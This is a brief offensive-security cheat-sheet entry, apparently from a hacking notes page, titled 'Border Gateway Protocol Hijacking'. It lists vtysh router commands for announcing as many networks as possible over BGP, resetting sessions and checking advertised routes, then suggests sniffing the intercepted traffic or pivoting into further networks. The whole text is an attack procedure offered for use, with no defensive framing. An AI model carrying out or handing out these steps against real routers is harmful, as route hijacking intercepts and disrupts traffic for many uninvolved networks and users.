Border Gateway Protocol Hijacking (BGP)
STEPS/COMMANDS:
1) Run BGP config shell
vtysh2)
config terminal3)
router bgp NUM4) You can try to route as many networks as you can find
network HOST/CIDR5)
end6)
clear ip bgp *7) Check on the route
show ip bgp neighbors YOUR_IP advertised-routes 8) Now you can sniff network traffic, or pivot further through more networks!
Last updated